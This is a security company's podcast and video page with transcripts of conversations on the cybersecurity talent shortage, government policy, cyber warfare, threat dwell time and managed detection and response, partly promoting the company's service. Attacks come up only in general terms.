Resource Type: Podcast

SON OF A BREACH! Episode 4: Celebrating Women in Cybersecurity with Didi Dayton

While women’s numbers in cybersecurity lag behind men, female leaders in our industry continue to pioneer the way forward. Episode 4 of our SON OF A BREACH! podcast series celebrates International Women’s Month with security visionary Didi Dayton, who joins host and CRITICALSTART Chief Technology Officer Randy Watkins for some timely insights into security growth investments and the expanding female influence in cybersecurity. 

Dayton is a partner at Wing Venture Capital, responsible for Customer Markets and Programs. She has held executive positions in sales, channels, and alliances for more than 20 years across multiple successful cybersecurity companies, including hyper-growth organizations such as Websense, FireEye, and Tanium. 

She successfully led sales and channel teams at companies such as Symantec, Arrow, and Cylance (now Blackberry) through 12 M&A and integration activities. Didi has received CRN’s prestigious Channel Chief award four years running, and she was named to the 50 Most Influential Channel Chiefs and the Power 100 Women of the Channel.  

Tune in for expert perspectives on:  

  • Security investment strategy and trends 
  • Which leadership traits are most important for sales and channel leaders 
  • Mistakes CIOs and procurement teams need to avoid 
  • Why organizations benefit from women’s style of decision-making 
  • Dayton’s advice to women for success in leadership  

Dayton and Watkins also deliver shout-outs to some of the leaders who have influenced them most in their careers – who just happen to be women. 

Watkins also provides highlights of how SolarWinds testimony before the Senate Intelligence Committee became a blame game, plus the recent attack against Microsoft Exchange Servers by a suspected Chinese-based attack group. 


The Impact of Talent and Resource Shortages in Cybersecurity

It’s no secret – there is a severe talent and resource shortage in cybersecurity, but what is the impact it’s having on our businesses? CRITICALSTART’s Jordan Mauriello and Michael Balboni, former advisor to Homeland Security, talk about strategies to address cyber defenses given these shortages.

Full Transcript:

JM: Hey guys, Jordan Mauriello with CRITICALSTART here, Senior Vice President of Managed Services. Today I have with me Michael Balboni, President of Redland Strategies, former Senator, Assemblyman, advisor to Homeland Security. Honored to have him here with us today. We’ve been doing some awesome discussions about things that we’re doing at CRITICALSTART and working with Redland Strategies.

JM: Today we wanted to take an opportunity just to talk to Michael about some general cybersecurity issues. He’s a major influencer in our community. I know many of you already know who he is and has had a major impact even on some of the legislature that we’ve seen around our industry too as well. We want to take the time to get some thoughts from him on some of the direction the industry’s going impact that some of the changes we see in cyber in general are having on national defense, the role of Senate and Congress, and where that’s going from a legislature perspective.

JM: We’re going to open up and have a nice, fun conversation here about some of these issues. Thank you so much for being with us, Michael.

MB: Thanks for having me Jordan, and thanks for your service to the country in the military.

JM: Thank you very much, sir. I appreciate your support.

JM: Probably the next biggest problem in security outside the signal to noise ratio problem is talent, resources, and resource shortages. If you’re not a core competency in security or technology and then you’re trying to hire security and technology professionals, well now are you going to compete with organizations who are going to pay a premium for those because those resources are going to bring in revenue for those. I think it’s a big problem we see out there. Obviously, there’s a massive talent pool shortage, but it’s also so competitive for cybersecurity resources today.

MB: It’s funny. When I was back in the Senate, and this was a long time ago, 2005-2006. I actually introduced legislation to try to create scholarships at State University level for the creation of cybersecurity courses. You’re absolutely right. There is an absence of well-trained cybersecurity. Other nation-states like China have basically institutionalized the cyber hacking. They’re training all these cadres of soldiers to learn how to do this. I’m not saying we set up hackers, but I think in terms of understanding what the IT security dynamic is, we need to do a lot better of that with our institutions, our educational institutions. In the absence of that, a lot of companies are uncomfortable with offloading that responsibility of monitoring and responding to network threats. First of all, it’s expensive a lot of times and secondly, you don’t necessarily have control of everything that’s in your environment.

MB: A lot of companies might be dealing with sensitive information. Again, having insurance, having a well-qualified vendor, those are steps along the way, but there should be other strategies where you can internalize your cyber defenses so that you can give assurances to the board of directors, to your shareholders, to your customers and frankly to your staff that you have worked through all the different possibilities of what cyber could mean and you’re going to continue. You’re going to make sure that the systems you’ve set in place will create a business as usual environment.

JM: That’s a great answer. I think it’s a great way to approach the board is that you’re talking about helping keep business as usual as the primary goal and focusing on your core competencies.

Government’s Role in Cybersecurity

What role does the government play in cybersecurity? Is it a private sector or government responsibility? Find out what CRITICALSTART’s SVP of Managed Security, Jordan Mauriello, and Michael Balboni, President of Redland Strategies, and former Senator, assemblyman, advisor to Homeland Security, had to say about this issue and more.

Full Transcript:

JM: Hey guys, Jordan Mauriello with CRITICALSTART here, Senior Vice President of Managed Services. Today I have with me Michael Balboni, President of Redland Strategies, former Senator, Assemblyman, advisor to Homeland Security. Honored to have him here with us today. We’ve been doing some awesome discussions about things that we’re doing at CRITICALSTART and working with Redland Strategies.

JM: Today we wanted to take an opportunity just to talk to Michael about some general cybersecurity issues. He’s a major influencer in our community. I know many of you already know who he is and has had a major impact even on some of the legislature that we’ve seen around our industry too as well. We want to take the time to get some thoughts from him on some of the direction the industry’s going impact that some of the changes we see in cyber in general are having on national defense, the role of Senate and Congress, and where that’s going from a legislature perspective.

JM: We’re going to open up and have a nice, fun conversation here about some of these issues. Thank you so much for being with us, Michael.

MB: Thanks for having me Jordan, and thanks for your service to the country in the military.

JM: Thank you very much, sir. I appreciate your support.

JM: One of the things that I was really interested to talk to you about today and get your thoughts on specifically was, what role do you see Senate and Congress playing in cybersecurity here in the near future? Obviously, I think you were a big proponent of even some of the involvement, the debate that happened over the last couple of administrations. How do you see some of that playing out here in the future?

MB: Ever since the Bush administration, after the 9/11 attacks, there was a focus on cybersecurity. As the threats began to evolve 2004, 2005 there were changes to the way we did intelligence or changes on the outskirts of the cybersecurity. What happens is every time there’s a bill that Congress or the Senate puts forward to try to set up goals for what cybersecurity, cyber resiliency, cyber compliance should look like, they will always be shot down. A lot of times, it was the US Chamber of Commerce that would come in and sit there and say, “You know what? We don’t think that changing the rules by which people play is going to be an effective strategy because the rules change as the threat changes, as the landscape, as the IT develops and evolves.” What’s happened, is the administrations, whether it’s Bush, Obama, Trump where they’ve all come back and they’ve said, “Let’s do it by presidential directive.”

MB: It actually morphed into Obama, the Homeland Security privilege … sorry, cyber resiliency, which I think was the first way they started and they had a presidential directive that basically set up a guideline. Now what’s also happened is that the regulatory agencies, the Securities and Exchange Commission, the CMS, the Office for Privacy and the Health and Human Services, they’d come out with very rigid guidelines as to how do you protect personally identifiable data, how you protect patient health information. They’ve set up all these requirements that really follow the National Institute of Standards and Technology Standards that a lot of people sit there and say, “Okay, this is what we ought to be doing but they’re more advisory at this point in time than actually you have to comply with them.” We’ve seen the goalposts of what constitutes a cyber secure society move as different players get involved if an industry is regulated.

MB: If you went to the library of Congress and when you grabbed into the shelf and wanted the book on cybersecurity and in the United States, you wouldn’t find it. There’s all sorts of different rules and regulations, and therefore you have a different kind of compliance bandwidth on that. Congress and the Senate are trying to wrestle with this all the time. They know the threats and the huge issues as it place to local government but then there’s this big issue that you and I’ve talked about it.

MB: What is the role of government in cybersecurity? Is it a private sector of responsibility and not a government responsibility? It’s two schools of thought. One is, you view cybersecurity as bricks in a wall, and every time a corporation does something that makes us more secure, every time a government agency does something that’s more secure, it builds up the wall of defense.

MB: Therefore, there’s a real role that the private sector needs to take on their own. We should incentivize them to get really serious about cybersecurity. The other school of thought is it really is the government’s responsibility. If God forbid, the Canadians became bellicose and started attacking Plattsburgh, New York right on the border. Certainly, you’d have all of DODs assets coming into Plattsburgh and protecting them. There’s the school of thought that says, “No, no, no, no, no. This is a national security initiative and a priority, and therefore the federal government should be funding, they should be providing expertise and they should be providing monitor and response to any type of cyber incident.” We’re really good. We have not as a country, we’ve really not come to one decision as to how we’re going to handle cybersecurity.

JM: Yeah, I think it’s a fascinating thought that you shared about. If we looked at kinetic warfare, the response is always that the federal government absolutely is responsible, but we see so much happening in the cyber warfare landscape where it is nation-state actors, given attribution is always a challenge in any of these cases, but we do know based on the sophistication and even other intelligence mechanisms that we’ve had these kinds of issues. How do we draw that line? How do we find out what is the right response? How much should the federal government be involved? What is their responsibility? I think it’s a challenge in something that we’re going to continue to be working through over the next 5-10 years and the next following administrations too as well.

Fighting the Unknown: Next-Generation Cyberattacks and Vulnerabilities

In next-gen cyberattacks and vulnerabilities, you’re fighting the unknown. Building a catalog of trusted behavior to use as a baseline to determine what falls outside normal business variances is one such strategy to change the paradigm of response. CRITICALSTART’s Jordan Mauriello and Michael Balboni, former advisor to Homeland Security and President of Redland Strategies, talk about trusted behavior and evolving strategies.

   —
Full Transcript:

JM:  Hey guys, Jordan Mauriello with CRITICALSTART here, Senior Vice President of Managed Services. Today I have with me Michael Balboni, President of Redland Strategies, former Senator, Assemblyman, advisor to Homeland Security. Honored to have him here with us today. We’ve been doing some awesome discussions about things that we’re doing at CRITICALSTART and working with Redland Strategies.

JM:  Today we wanted to take an opportunity just to talk to Michael about some general cybersecurity issues. He’s a major influencer in our community. I know many of you already know who he is and has had a major impact even on some of the legislature that we’ve seen around our industry too as well. We want to take the time to get some thoughts from him on some of the direction the industry’s going impact that some of the changes we see in cyber in general are having on national defense, the role of Senate and Congress, and where that’s going from a legislature perspective.

JM:  We’re going to open up and have a nice, fun conversation here about some of these issues. Thank you so much for being with us, Michael.

MB:  Thanks for having me Jordan, and thanks for your service to the country in the military.

JM:  Thank you very much, sir. I appreciate your support.

MB:  Maybe we need to change the whole paradigm of how we look at threats. Are we looking for the bad or should we look at behavior in a trusted kind of way? And maybe build a database, a registry, if you will, to be able to catalog what are the normal course of business operations that we know are trusted behavior and maybe create that baseline that if there’s a variance of that, that we can instantly go and say, “Whoa, that’s what we have to take a look at,” and everything else, you push it back and say, “No, no. Not coming in.” I think that might change the paradigm of response. I’m really interested in that strategy.

JM:  Obviously, we agree with you on that one fundamentally as it’s part of our model even here is working off of a model where you’re building a trusted behavioral registry. I think that’s a paradigm shift that the industry has to seize. We constantly play this game where we’re chasing the known bad and always looking for how to identify bad in a higher fidelity mechanism or to add more detail enrichment to known bad, so that we can find it in this massive sea that we talked about earlier.

JM:  It’s not working for a couple of reasons. You just talked about the attacker advantage. The attacker advantage is they only have to be right one time, right? We only have to be wrong one time to lose. The expectation that we would hit 100% as defenders is unrealistic. That’s why we have to have that resiliency. I think that’s why the model, the paradigm for analytics, for how we look at data insecurity has to be shifted so dramatically because we are not catching up. We’re definitely falling behind when it comes to that mechanism.

MB:  We’re really obsessed with the infrastructure of security and we’re not data-centric. It goes back to your original comment about how we triage what we need to protect. You don’t need to protect everything. No, you don’t. I’m not saying that you should tolerate intrusions, tolerate breaches, but you should at the very least focus all of your efforts on protecting the main point of your company, your business, the people you serve, which is their data and the data you have as your company.

MB:  From that perspective, we’ve got to be able to stop anything from getting into that environment. The question becomes “How do we do that effectively, timely?” One of the things that really gets me crazy is when I hear about the dwell time stories, that is the amount of time that malware will sit on a network before it’s discovered and addressed. In that time, so much damage can be done.

MB:  As we talked about beforehand, surveilling the network for vulnerabilities, surveilling the network for assets that you might want to raise up in terms of their profile, we want to go get this stuff and then being able to use, to recognize other avenues to get into other networks. A lot of times, what we’re seeing now is that one of the attacks that that will be used is to take a network and make it to a bot network and basically commandeer that network and say, “Okay, now we’re going to use it and we’re going to attack others,” and then you send a note to the network administrator saying, “By the way, we’ve compromised your network. We’re going to use your network to attack others unless you pay this amount of ransom.”

JM:  There’s no lack of invention or creativity from the development of different threat factors, but there is a lack of imagination when it comes to how we prevent those things from happening because we’re stuck in his defense, this castle keep type of mentality.

JM:  I completely agree and I think you’re right. You see all these different creative mechanisms in the attack. You’ve talked about turning it into a botnet, whether that’s for attack or even for what we call crypto-jacking today. They’re going to take those systems and use the computing resources to mine cryptocurrency. We have all these creative mechanisms. Again, getting back to monetizing that threat. I think the dwell time remarks are dead on. I think some of the reports we’ve seen from some of the big players doing threat intelligence in our space, they’re scathing analysis of our industry’s capability when we’re looking at dwell times in excess of 45, 80, 120-day dwell times as averages in different sectors in our industry.

JM:  You definitely see this massive difference in organizations and capability and there’s not a standard set maturity.

Cybercrime: The Monetization of Security Threats

How do you stop the burgeoning field of cybercrime? From ransomware to malware as a service, the monetization of security threats is growing. Yet given this literal fire hose of threats, how do security teams efficiently and effectively identify real threats? CRITICALSTART’s Jordan Mauriello and Michael Balboni, former advisor to Homeland Security, have some thoughts on this issue.

Video Transcript:

JM:  Hey guys, Jordan Mauriello with CRITICALSTART here, Senior Vice President of Managed Services. Today I have with me Michael Balboni, President of Redland Strategies, former Senator, Assemblyman, advisor to Homeland Security. Honored to have him here with us today. We’ve been doing some awesome discussions about things that we’re doing at CRITICALSTART and working with Redland Strategies.

JM:  Today we wanted to take an opportunity just to talk to Michael about some general cybersecurity issues. He’s a major influencer in our community. I know many of you already know who he is, and has had a major impact even on some of the legislature that we’ve seen around our industry too as well. We want to take the time to get some thoughts from him on some of the direction the industry’s going and the impact that some of the changes we see in cyber in general are having on national defense, the role of Senate and Congress, and where that’s going from a legislature perspective.

JM:  We’re going to open up and have a nice, fun conversation here about some of these issues. Thank you so much for being with us, Michael.

MB:  Thanks for having me Jordan, and thanks for your service to the country in the military.

JM:  Thank you very much, sir. I appreciate your support.

JM:  One last thing I’ll ask you before we wrap it up here today. If you could make one recommendation to C-suite executives about cybersecurity and risk, what would that recommendation be today?

MB:  The recommendation would be to spend time thinking about your data and what needs to be protected. How are you protecting it today and is there a better way to identify the threats? The old metaphor I use is if you knew where a fire was going to break out during the year, you knew the day and the time that a fire was going to break out, even on a place like my home area of Long Island with 3 million people, but you knew where a fire was going to break out, you would only need one fire department.

MB:  They could go there and they can wait, what’s going on? The same analogy works with, if you knew where threats were coming from and you could actually resolve and get rid of so much of the uncertainty and only focus on the things that really mattered that went after your core data and you could stop that, that’d be such a better use of time, much more cost-effective and frankly give you the surety that you have the ability to identify and stop a threat. That’s really where I want CISOs to get to.

JM:  That’s great. Well, I so much appreciate your time. Thanks for being here with us.

MB:  It’s been great working and collaborating with you. This is a really important topic.

JM:  It’s a pleasure. All right. Well, thank you guys for joining us today. We appreciate it and hope you enjoyed our topics.

Cyber Warfare: How Wars May Be Fought in the Future

How will wars be fought in the future? Are we keeping up with the times in cyber warfare as a nation? As these questions linger, one thing we do know: the U.S. has woefully under-resourced the country’s cyber defense as we have not decided which critical assets need protection. Former advisor to Homeland Security Michael Balboni shares insights with CRITICALSTART’s SVP of Managed Security, Jordan Mauriello, on cyberwarfare and what the U.S. needs to do to prepare.

Full Transcript:

JM: Hey guys, Jordan Mauriello with CRITICALSTART here, Senior Vice President of Managed Services. Today I have with me Michael Balboni, President of Redland Strategies, former Senator, Assemblyman, advisor to Homeland Security. Honored to have him here with us today. We’ve been doing some awesome discussions about things that we’re doing at CRITICALSTART and working with Redland Strategies.

JM: Today we wanted to take an opportunity just to talk to Michael about some general cybersecurity issues. He’s a major influencer in our community. I know many of you already know who he is and has had a major impact even on some of the legislature that we’ve seen around our industry too as well. We want to take the time to get some thoughts from him on some of the direction the industry’s going impact that some of the changes we see in cyber in general are having on national defense, the role of Senate and Congress, and where that’s going from a legislature perspective.

JM: We’re going to open up and have a nice, fun conversation here about some of these issues. Thank you so much for being with us, Michael.

MB: Thanks for having me Jordan, and thanks for your service to the country in the military.

JM: Thank you very much, sir. I appreciate your support.

—-

JM: How do you think specifically when we talk about how wars are going to be fought in the future and we look at it what national defense mechanisms we have and how those have to change. How do you see that evolving and do you think that we’re staying up to speed and with the times from a cyber warfare perspective as a nation?

MB: I think that we have woefully under-resourced our cyber defense. The reason why I said that is because we have not decided what are the critical assets we need to protect. You can decide that there’s a triaging of national assets and national vulnerabilities that we need to fix collaboratively, that the private-public partnership should and is the model, particularly if you adopt some of the standards like that NIST standard we referred to before. At the same time we haven’t really decided, “Well, is it power plants we need to really focus on? Is it healthcare?”

MB: We’ve seen the “WannaCry” ransomware attack and the Ryuk attack that have convinced the world, “Boy, it’s pretty easy to get a worm into a network, be able to search across the entire network, find vulnerabilities in that.”

MB: In the case of WannaCry, of course it was the Windows program that had been unsupported, unpatched and then spread throughout the world, throughout the globe, and have potentially dramatic impacts on how things happen. Of course, whether it was the British hospital network, whether it was the Maersk shipping where ports actually were close to being shut down, these things that have a global impact, we have not figured out first of all how to classify them. Is that an act of war? If you knew, if you could really prove that a particular nation-state perpetrated this act, is that an act of war? Do you go from the digital to the kinetic? In addition, our intelligence community, we want to know who is attempting to get at us.

MB: We want to know their level of sophistication. We want to know what assets they have available to them. We want to know where they’ve been beforehand because everybody in the cyber world understands that it’s not like you weaponize a payload, distribute it into a network, and then immediately begin executing commands to either steal data or to interrupt the operating network. They may lay dormant, dwell time is what we call it, where they’re going to wait and they’re going to basically surveil the operating environment and see what other vulnerabilities exist to see what other assets they could go after. Map that and then get that information out to their controllers to say “So, here’s what you could go after. You tell me where and when you want to go after.” There’s no immediacy of the attack and response.

MB: The last piece is we walk around with our cell phones and we have more computing power on our cell phones than they had on the first lunar lander.

MB: It’s ubiquitous computing. Matter of fact, there’s a statistic that by 2023, I believe it is, there will be 7 billion phones on the planet. Much more than obviously the population of the earth. Each one of them has the ability to communicate, to calculate, to transmit data, and therefore, become a single point of entry into a network.

MB: How do you secure all those endpoints and how do you make sure that people are aware of the fact that they have a vulnerability that they’re walking around their pocket with? A lot of information needs to get out there. A lot of understanding, awareness, and then strategies and solutions.

CRITICALSTART & ePlus | National Cybersecurity Awareness Month Podcast

Full Transcript:

LW: Welcome. Thanks for joining everyone, my name is Lee Waskevich, vice president of security and networking strategy here with ePlus. Today, I’m joined by Randy Watkins with CRITICALSTART.

RW: Hey! Thanks for having me on.

LW: Absolutely, absolutely. appreciate you joining us.

LW: So, we’re going to run through a few different questions today, mainly regarding manage detection and response. We’re seeing a ton of activity in speaking with our clients around the subject, customers that are dealing with attack vectors, moving workloads into the cloud. They’re struggling with retaining talent or training talent, being able to provide a strong sense of security operations. From your vantage point with CRITICALSTART, why do you see MDR is gaining so much attention.

RW: There’s a lot of traction in the space and there’s multiple reasons for it. Something that we come across, pretty generally when customers are looking at MDR, is the ability to provide 24×7 monitoring.

RW: So, that’s something that is kind of being amplified in terms of importance because of nation-state sponsored attacks or crime-based attacks that are overseas. And they operate on much the opposite schedule than a typical eight to five security team does. So, just that availability of 24×7 response is driving the overall MDR market.

RW: Another thing that we see pushing us forward in terms of MDR momentum is operationalizing technology. I’m sure everybody’s seen it or been there, done that. But you look at the technology that a customer has or that an organization has, and they’re not using any of it. It’s kind of there but it’s not plugged in, or it’s plugged in and nobody is looking at it. And what that results in this is kind of wasted resources. And as resources are so limited, organizations really have to take advantage of everything that they have and that means fully operationalizing their technology.

RW: Well, you kind of talk about the lack of resources in the space and how hard it is to attract and retain those resources and, you know, kind of transferring that risk of the resource is a good choice for organizations that want to be able to operationalize their technology.

LW: Ok, great. Yeah, we see that as well. You know, consulting with clients and their security program, relooking at their architecture, we see a lot of shelfware out there. You know, they’ve made good, strong choices, but I think they get drawn into the day to day type stuff and they never go back and optimize, they never go back and integrate those technologies. So, a service like MDR helps to put a lot of that operational piece together.

LW: How about from the size of organizations that are good candidates for MDR. Can you comment on what you see in terms of who makes a good customer for Managed Detection and Response?

RW: Yeah. So, when we started the MDR business about five years ago, we really thought that our average customer size was going to be between 500 and 1,000 users. We figured that was a sweet spot and we really looked at it like that because we figured the larger organizations, the enterprises, people with 5,000, 10,000, 50,000 users. They were going to have a more mature security program. And we started to really market towards the SMB space, that 500 – 1,000 users.

RW: Well, what we found after the first year was our average customer size is about 1,500 and growing. And it was because, although we’d love to assume that large organizations have much more secure environments, that wasn’t necessarily the case.

RW: So, now what we see is kind of broad adoption of MDR from the 10-person dentist office, all the way up to, you know, we have customers that are 100,000 users. And it’s because of what you just talked about.

RW: They’re continuously going from implementation to implementation to implementation. They never really get to operationalize the technology. So, they install a SIEM, they install IBS, they install an EDR, but they’re not really getting anything out of it, because when they get done installing it, they move on to the next project. They never get to resolving those alerts. So, even the larger organizations are having a difficult time getting the resources to both implement and operationalize the technology.

RW: So, right now our average customer size is probably somewhere in the 8,000 users range, but we have customers that are 100,000 endpoints, we have customers that go through MSPs that are 10 endpoints. There seems to be no bounds as to what a good market for managed detection and response is.

LW: Ok. So, it really can cover any size and scope of an organization as long as they have the guidance to see, “Hey, we really need to spend some, some focus on operationalizing things.”

LW: You know when you, when you look at managed detection and response, you know, the detection and response piece was, you know, kind of came along for the ride with endpoint detection and response. We saw technology providers, software, around that endpoint shift over the past 18, 24, 36 months. Why do MDRs focus so much on the endpoint and how does CRITICALSTART use that in relation to their service?

RW: There’s two main reasons that we focus on EDR. One, it’s a definitive source for information. And what I mean by that is, if you think from an analyst perspective what you’re going to do when you get a firewall alert or an IDS alert or a, I mean, most types of alerts. If I get for instance a blocked outbound C2 communication, the first thing that goes through my head is, “what’s happening on that endpoint that is causing it to communicate outbound to a C2”, right?

RW: So I’ll want to identify the process that’s trying to communicate the user contacts, how did that process get there. I really want to dig in and figure out, not the nature of the network request, but what’s making that network request.

RW: So, that’s the first reason. The second reason is because the endpoint is the best place for response. I mean, there’s really two places you really want to be able to respond and that’s on the endpoint and via Active Directory with disabling user accounts.

RW: We really look at the endpoint as a way for us to, you know, we have managed detection and response, we look at the endpoint as a great way for us to respond.

RW: We did, for a while, block things at the firewall and what we found was users are mobile. They would take their laptop home and all of a sudden they’re beaconing out again. So, that’s why we have a focus on endpoint.

RW: Now at CRITICALSTART, we make very, very deep technical integrations. What we do is, we’ll use API’s to pull in the alerts that are created by these different endpoint products, and then we use the API’s to go back and get additional information, as well as performing those response actions.

RW: So really, we’re making our integration so tight that our analysts and our customers can work through our platform to do just about everything they can do inside of that endpoint. And what that does is it breeds efficiencies.

RW: The endpoint is really a strong place for us to kind of leverage the technology to not only create the service but also gain that efficiency of keeping all of our analysts in a single queue, in a single platform.

LW: Okay. All right great. That makes a ton of sense. I think another unique aspect is your model for resolving alerts, right? Many SOCs and MSSPs and customers that try to do it on their own, they deal with alert fatigue because there’s so many events and things like that coming in. Can you talk about how you accept risk and the models that you have around resolving alerts?

RW: Yeah. So, in terms of risk acceptance, we don’t, right? Because that’s on the customer to do. When you look at, I think it’s important that you called out MSSPs, MDRs, as well as internal SOCs. They all suffer from same issues, which is we’ve looked at security products we’ve looked at manufacturers to be extremely effective at detecting attacks.

RW: The problem is, when you’re effective at detecting attacks, you’re typically over detecting as well, right? It’s always better to err on the side of a false positive.

RW: So looking at how MDRs, MSSPs, and in-house SOCs, looking at how they respond to these alerts that are coming in and the false positives. There’s really two ways that we’ve seen organizations deal with this. The first was what we call input-oriented, where you’re essentially shutting off speeds and feeds that are maybe lower fidelity or that garner too many alerts. And the problem with that approach is, you’re accepting unquantified risk. I mean, you’re accepting risk that you don’t quite know you have because you turned off the product’s ability to detect that risk.

RW: So that kind of makes the product was effective and what ends up happening is, you get breached and you go, “Why didn’t we pick this up?”. Well, because you had to turn off the rule

RW: The second way that we see is called prioritized or priority oriented. This one is extremely common. We see it in SOCs, we see it in different MDRs and MSSPs. And this is where you kind of start at the top of criticality and you work your way down the stack until you run out of resources.

RW: So, “Hey, we’re going to look at criticals. If we have enough time, we’ll look at highs.”

RW: Most organizations never get to the mediums and lows. The problem with that is you’re accepting quantified risk. So now you know that it’s risky, you have it up on the board in your SOC but you say, “Oh, it’s a medium. We don’t have the resources for the organization that the business is going to accept that risk.”

RW: And that one’s kind of dangerous because we have pretty well-documented cases of multiple times when an alert has shown up in a SOC, but it was a medium or low and it got kind of brushed off, and then it resulted in significant breaches, executive-level turnover, massive disclosure, billions of dollars in loss.

RW: So, when we started the MDR. The goal was to not do any of that. Hot tip for anybody watching, if you want to accept risk, you don’t have to pay anybody to do that. You can just do that by yourself.

RW: So our model seeks to accept no risk. So what we do is, we look at every single alert that a product generates, that a security product generates, and we resolve every single alert that comes in, so we’re not accepting risk and we’re not limiting the effectiveness of the product.

LW: Ok. Yeah, makes a ton of sense. You’re taking it all in. You’re the ones making the determination on that through your technology, through your skills and training. Alright. Excellent. Yeah, that makes a ton of sense.

LW: I think another important piece, outside of you mentioned how you do so much around technology integration, you’re leveraging the technology stacks that a customer has, but there’s also a people component to this, right? Because when a customer interfaces with their service provider, especially as security service provider, many times it’s over email, or they’re picking up the phone and calling someone. Can you talk a little bit about CRITICALSTART’s culture and the analyst retention rate that you guys have?

RW: Yeah. So, we consider ourselves a technology-enabled service. And when you look at the spectrum there’s kind of two sides and then the middle. So the two sides, you have MSSP on one side. They view this as a people problem. We’ll throw more people at, throw more people at it, throw more people at it. That usually results in high turnover, because you’re not solving the underlying problem.

RW: But then there’s a SaaS model. The SasS model says this is purely a technology problem and we’re going to create a platform that does all this automatically.

RW: And then there’s kind of tech-enabled services that sit in the middle and that’s where we are.

RW: So what we did was we created the platform first that helps us resolve every alert. And then we found a way to kind of avoid analyst burnout. If you look at the number one reason of analyst turnover, it’s because they’re all looking at the same alerts over and over and over and over every day, and there’s no resolve. So, we built a platform that allows us to get rid of that problem by resolving every alert, and then once we see it once, we’ll automatically resolve it in the future.

RW: Well, what that has led to is a 99% employee retention across all of our SOC analysts. We’ve lost one analyst last five years. And what that means is, we can spend a tremendous amount of time, energy, resources, money training these analysts to be fantastic, world-class analysts. There’s an old adage I love to refer to: would you rather train an employee and risk them leaving, or not training an employee and risk them staying? Well, if we solve the problem of them leaving then we can sink the resources into training them and making the world-class analysts.

RW: So, all of our analysts go through about 160 hours of training before they ever touch or see customer data.  After that when they become an official tier-one analyst, they know how to get to become a tier two and that involves x86 and 64-bit programming classes so they can start the reverse malware. Now that’s just at tier-two. There’s tier-three and four as well. They get into threat intelligence and campaign identification, as well as different leadership roles.

RW: So really what we did was, we created the technology that really encourages people to stay and it kind of gets rid of the mundane, so every alert they open up has the potential of being a new APT, a new piece of ransomware, a new piece of malware. And then we train them to really dive into every single one of those alerts and what the result is, is a fantastic service for customers where they feel like they have a world-class SOC at their fingertips because they actually do.

LW: Gotcha. No, that makes total sense and it does provide, I think from putting myself in the customer’s shoes, a higher level of confidence in the resources that are helping me to operate my security and to help detect and respond against those threats. So that’s great. Thanks.

RW: To add on there, what we see is customers being able to elevate their resources, because of our resources. So we go into a lot of organizations especially these ones that have 10, 15, 50,000 users. They already have a security team. It’s not enough to provide full 24×7, but there is a security team there.

RW: And a lot of times when we come in, the analysts on the team they’ll start to have this whole “are you outsourcing my job” type mentality. No, no, no, no. We’re taking the tier-one and two. We’re gonna escalate things to you to be responded to. You get to elevate your position to incident responder to pentester to threat hunter. You get to get rid of this, “Hey, I’m looking at all of these alerts today,” and you get to really move into, “I’m going to find something unique, interesting, truly different inside of my environment.”

RW: So, our resources and the training that we put into that really kind of allow the customer to elevate their limited resources to positions that are more valuable to the company.

LW: Right. Yeah, that’s especially true right now. Especially as budget are tightening and others want to make sure the resources are being used for what they were hired to do or what they had the capabilities to do.

RW: Exactly!

LW: That’s where the strengths going to be. Very much agree.

LW: Last question, we’ve been having this conversation a lot around, you know, this is being recorded in Fall of 2020, so you know since the march time frame, since everything that’s gone on globally this year. What has changed in your world since that time and what you’re seeing from both, you know, the CRITICALSTART standpoint of the security spectrum, if you will, of all of these threats and alerts, as well as your dealings with clients.? Any insights you could provide there?

RW: It’s been a rough couple of months, right? I mean, a lot of organizations trying to adapt and figure out how to keep their business operational during this time of COVID. We’re seeing a lot of users go into work remote, including the security team. And that’s what most organizations are, that we’re talking to, or dealing with, or that we’re exposed to, is “hey, how does my security scale across all these remote users?” Because when users go home, regardless of whether they’re using a corporate asset or a personal asset, they’re more likely to do things that maybe aren’t work-related that generate more and more alerts. So, what we’re seeing is a lot of users going to work from home or working remotely and then a spike in alerts, but because the security team is now all remote there’s an inherent efficiency loss. So, you have more alerts, you have less efficiency on the security team, and you have to deal with every one of them because hackers see this as a great opportunity.

LW: Yeah, exactly.

RW: From an attacker’s perspective, never let a crisis go to waste, right? So, we’re seeing massive email campaigns with a ton of COVID attachments, we’re seeing a lot of drive-by downloads, we’re seeing a lot of spear phishing, we’re seeing a lot of email compromise, we’re seeing a lot of whaling. I mean, kind of all the attacks are starting to bubble up, not just because COVID is a great excuse to send out an email, but also because it’s very difficult for me to kind of yell across the room and says, “Hey, are you sure you want me to transfer this money”.

RW: So, this whole remote worker issue combined with the hot topic of COVID for attackers to leverage, is really just spiking the alerts. From our perspective on the business side, we’re seeing a lot of customers come to us saying, “how do we remedy this.” And we have a pretty obvious answer, you know, Managed Detection and Response. Let us take the tier one or tier two and some of the response capabilities, use your limited resources to help deploy policy or provide user education, and let’s see if we can drive up the security posture of the organization although everybody is remote.

RW: So, it’s kind of this perfect storm that we’re trying to fight against and it’s a unique battle.

LW: Yeah, exactly. We see the same thing from the ePlus side and it’s about helping that customer to drive their program forward. So yes, this Managed Detection and Response becomes a very, very important piece of that. And dealing with, you know, preying on the curiosity of people, preying on the fact that everyone is so distributed, there’s a lot of weak areas of the chain, if you will, that can be exploited and without the proper controls and without proper emphasis and focus on it, it’s really difficult for organizations. And we see it every day in the news, something different on either a breach type attack, a lot of ransomware being hit. All those pieces can be mitigated to a degree with the proper precautions being taken. So awesome. I appreciate that.

RW: Yeah and that’s another reason why we focus on the endpoint. Gartner has their triad of logs, network, and endpoint, and nothing against network, but when all of your resources are distributed and once you have always-on VPN backhauling all the traffic, network kind of wanes in importance,

RW: But you’re going to have an agent, right? So, we focus on endpoint because it allows us to reach out and touch those remote resources and still maintain some level of visibility and protection even when the users are working from home using a SaaS-based application.

RW: We’ve had to find better ways to go out and work with those remote resources. A lot of customers that are we’re talking to are reevaluating their endpoint solution to make sure that it’s the right one because now that’s growing in importance. We’ve done a lot of consultation with ePlus and customers saying, “Hey, let’s have ePlus work through all your different requirements and find the right solution, then we can sit on top of it and manage it”.

RW: One of the big perks for CRITICALSTART is, we don’t just tie into one solution. We support multiple endpoint products. So, ePlus can really go in, do some consulting with a customer and say, “Hey, based on your requirements your organization, this is probably the best solution for you,” and CRITICALSTART can then come on over top do that tier one and two to really not just promote the resources necessary, but also the correct solution.

LW: Right and bringing that full circle then they’re faster time to operation, right? And actually finding that efficiency with the purchase that’s being made, with the investment that’s being done, rather than trying to sit there, integrate slowly roll it out. With CRITICALSTART services on top right away, you’re immediately recognizing that value. Awesome.

